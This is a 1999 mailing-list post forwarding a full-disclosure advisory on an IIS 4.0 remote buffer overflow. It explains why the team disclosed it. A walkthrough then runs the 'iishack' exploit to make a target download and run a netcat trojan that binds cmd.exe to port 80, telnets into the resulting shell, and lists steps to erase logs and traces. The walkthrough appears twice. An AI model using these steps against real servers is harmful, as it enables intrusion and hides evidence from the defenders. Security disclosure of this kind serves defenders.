Subject: Retina vs. IIS4, Round 2 - The Exploit--Dicek pek bir sey yok sanirim........
From: Ozan Ozkara (colony@istanbul.linux.org.tr)
Date: Fri 15 Oct 1999 - 16:34:14 EET DST
Retina vs. IIS4, Round 2 - The Exploit
We contemplated releasing this exploit and decided to do it after Microsoft
neglected to give it the attention it deserves. After the fifth day of
reporting the bug to Microsoft, they stopped responding to our eMails. On
the 8th day we felt that it was our duty to make our voice heard.
Here Is Why.
We are a full disclosure security team, and we were not working under any
non disclosure agreements with anyone. Our responsibility to our clients and
the whole network community is to disclose as many details as possible, this
is how other developers can pick up where we stopped and explore the exploit
in different directions, this is the way we can contribute to the security
community and keep software vendors working hard at producing more robust
products. This exploit demonstrates the seriousness of the hole, YES this is
a very serious hole and needs to be given the attention it deserves. If our
team starts hiding the facts, we'll be no better than a software vendor that
rushes insecure products to market. So here it goes...
The Target:
Lets say for this example we are targeting some random fortune 500 company.
Take your pick. We want to pretend this company has some "state of the art"
security. They are locked down behind a Cisco Pix, and are being watched
with the best of Intrusion Detection software. The server only allows
inbound connections to port 80.
Let's Dance.
We've crafted our exploit to overflow the remote machine and download and
execute a trojan from our web server. The trojan we are using for this
example is, ncx.exe. Ncx.exe is a hacked up version of netcat.exe. The
hacked up part of this netcat is that it always passes -l -p 80 -t -e
cmd.exe as its argument. That basically means netcat is always going to bind
cmd.exe to port 80. The exe has also been packed slightly to make it
smaller. Instead of a 50k footprint its 31k. So we run our exploit:
--------------------------------------------------------------------
--------------------------------------------------------------------
X:\Code>iishack example.com 80 ourserver.com/ncx.exe
------(IIS 4.0 remote buffer overflow exploit)-----------------
(c) dark spyrit -- barns@eeye.com.
http://www.eEye.com
[usage: iishack <host> <port> <url> ]
eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe
do not include 'http://' before hosts!
---------------------------------------------------------------
Data sent!
Note: Give it enough time to download your trojan.
X:\Code>telnet example.com 80
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\>[You have full access to the system, happy browsing :)]
C:\>[Add a scheduled task to restart inetinfo in X minutes]
C:\>[Add a scheduled task to delete ncx.exe in X-1 minutes]
C:\>[Clean up any trace or logs we might have left behind.]
C:\>exit
-------------------------------------------------------------------
-------------------------------------------------------------------
Note: Once we type exit in the telnet session our trojan exe, ncx.exe is
unloaded and is no longer listening on port 80. Therefore the web service
can restart and everything can seem back to normal. Now the example above
was a some what quick demonstration of how this could be used. Some things
were left out because this advisory is big enough as it is
Note: Now that we have proven the severity of this advisory we no longer
feel that it is necessary to distribute the exploit in a binary form.
However the source code is still available for download.
We are still committed to the full disclosure on this hole and we will
continue to help the security community in making the Internet more secure.
We will not provide support on using the exploit or compiling the source.
iishack.asm
X:\Code>iishack example.com 80 ourserver.com/ncx.exe
------(IIS 4.0 remote buffer overflow exploit)-----------------
(c) dark spyrit -- barns@eeye.com.
http://www.eEye.com
[usage: iishack <host> <port> <url> ]
eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe
do not include 'http://' before hosts!
---------------------------------------------------------------
Data sent!
Note: Give it enough time to download your trojan.
X:\Code>telnet example.com 80
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\>[You have full access to the system, happy browsing :)]
C:\>[Add a scheduled task to restart inetinfo in X minutes]
C:\>[Add a scheduled task to delete ncx.exe in X-1 minutes]
C:\>[Clean up any trace or logs we might have left behind.]
C:\>exit
Note: Once we type exit in the telnet session our trojan exe, ncx.exe is
unloaded and is no longer listening on port 80. Therefore the web service
can restart and everything can seem back to normal. Now the example above
was a some what quick demonstration of how this could be used. Some things
were left out because this advisory is big enough as it is.
Listeden cikmak icin:
unsub linux
mesajini listeci@bilkent.edu.tr'a gonderiniz.
Lutfen Listeci icin MIME / HTML / Turkce Aksan kullanmayin.
Liste arsivinin adresi: http://listweb.bilkent.edu.tr/